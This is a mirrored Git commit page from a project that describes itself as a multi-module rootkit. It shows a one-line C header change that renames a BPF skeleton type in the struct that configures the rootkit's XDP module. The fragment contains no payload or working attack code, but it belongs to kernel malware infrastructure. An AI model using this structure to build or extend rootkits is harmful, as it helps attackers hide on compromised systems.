mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-26 03:13:07 +08:00
Updated file names and directory structure to the new multi-modules rootkit
This commit is contained in:
@@ -34,7 +34,7 @@ typedef struct module_config_t{
|
||||
//Configuration struct. Used by the module manager to
|
||||
//correctly attach the needed modules, providing necessary params
|
||||
typedef struct module_config_attr_t{
|
||||
struct xdp_filter_bpf *skel;
|
||||
struct kit_bpf *skel;
|
||||
struct xdp_module_attr {
|
||||
__u32 ifindex;
|
||||
__u32 flags;
|
||||
|
||||
Reference in New Issue
Block a user